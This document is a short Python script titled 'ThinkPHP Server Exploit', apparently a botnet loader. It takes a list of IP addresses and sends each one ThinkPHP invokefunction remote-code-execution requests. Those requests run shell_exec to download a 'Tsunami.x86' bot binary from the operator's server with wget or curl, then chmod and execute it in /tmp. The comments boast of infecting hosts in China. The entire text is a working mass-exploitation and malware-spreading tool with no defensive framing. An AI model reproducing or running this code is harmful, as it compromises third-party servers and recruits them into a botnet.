ThinkPHP Server Exploit

1. #usr/bin/python
2. # Kadens ThinkPHP Loader
3. # Port 80 or 8080 (USE PORT 80 BEST RESULTS)
4. # Asia is most vulnerable. (I pull boats in China)
5. import threading, sys, time, re, os, requests
6. if len(sys.argv) < 2:
7.     print "\033[37mUsage: python "+sys.argv[0]+" list \033[37m"
8.     sys.exit()
9.  
10. server = "1.1.1.1" # YOUR BOTNETS IP
11. location = "OwO/Tsunami.x86" # YOUR x86 BIN (If it is in a dir do bins/x86.bin or whatever) if no dir it would just be the bin name
12. x86 = "Tsunami.x86" # The name of the x86 bin
13. ips = open(sys.argv[1], "r").readlines()
14. class think(threading.Thread):
15.         def __init__ (self, ip):
16.             threading.Thread.__init__(self)
17.             self.ip = str(ip).rstrip('\n')
18.         def run(self):
19.             try:
20.                 print("\033[37m[\033[36mThinkPHP\033[37m] Trying \033[36m-> \033[37m%s") % (self.ip)
21.                 payload = "http://"+self.ip+"/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://"+server+"/"+location+";cat%20"+x86+"%20>%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp"
22.                 payload1 = "http://"+self.ip+"/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20http://"+server+"/"+location+";cat%20"+x86+"%20>%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp"
23.                 requests.get(payload, verify=False, timeout=5)
24.                 requests.get(payload1, verify=False, timeout=5)
25.                 except:
26.                         pass
27.  
28. for ip in ips:
29.     try:
30.         kaden = think(ip)
31.         kaden.start()
32.     except:
33.         pass